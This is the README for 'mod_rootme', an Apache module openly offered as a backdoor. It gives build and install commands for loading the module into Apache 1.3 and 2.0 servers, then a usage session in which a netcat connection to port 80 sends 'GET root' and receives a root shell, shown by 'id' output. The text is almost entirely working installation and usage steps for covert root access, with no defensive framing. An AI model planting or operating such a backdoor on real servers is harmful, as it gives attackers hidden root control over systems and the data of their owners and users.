


           mod_rootme: making Apache almost as insecure as IIS 5



    What's new in v0.2
    ------------------

        * added full support for Apache 2.0.x

        * added AP13/EAPI magic cookie support.

        * master process properly exits when the
          apache server is shutting down.


    Installing mod_rootme
    ---------------------

        Note: when starting apache, if you get the message
        "mod_rootme.so uses plain Apache 1.3 API, this module
        might crash under EAPI!", you have to edit mod_rootme.c
        and replace AP13 with EAPI before compiling the module.


      -=[ Target: Apache 1.3.x (Debian) ]=-

        # make
        # cp mod_rootme.so /usr/lib/apache/1.3/
        # vi /etc/apache/httpd.conf (or modules.conf)
        [...]
        LoadModule rootme_module /usr/lib/apache/1.3/mod_rootme.so

        # apachectl restart


      -=[ Target: Apache 1.3.x (local ) ]=-

        # make
        # cp mod_rootme.so /usr/local/apache/libexec/
        # vi /usr/local/apache/conf/httpd.conf
        [...]
        LoadModule rootme_module      libexec/mod_rootme.so
        [...]
        AddModule mod_rootme.c

        # /usr/local/apache/bin/apachectl restart


      -=[ Target: Apache 2.0.x (Debian) ]=-

        # make
        # cp mod_rootme2.so /usr/lib/apache2/modules/
        # cat > /etc/apache2/mods-enabled/rootme2.load
        LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so
        ^D
        # apache2ctl stop; apache2ctl start


      -=[ Target: Apache 2.0.x (local ) ]=-

        # make
        # cp mod_rootme2.so /usr/local/apache2/modules/
        # vi /usr/local/apache2/conf/httpd.conf
        [...]
        LoadModule rootme2_module modules/mod_rootme2.so

        # PATH=/usr/local/apache2/bin:$PATH; export PATH
        # apachectl stop; apachectl start


    Using mod_rootme
    ----------------

        Make sure you have netcat installed on your system
        (the telnet client will not work for this purpose)

        $ nc 192.168.1.21 80
        GET root HTTP/1.0

        id
        uid=0(root) gid=0(root) groups=0(root)
        cat /proc/version
        Linux version 2.4.26 (root@gray) (gcc version 2.95.4 20011002
        (Debian prerelease)) #1 Tue Jun 15 10:15:34 CEST 2004


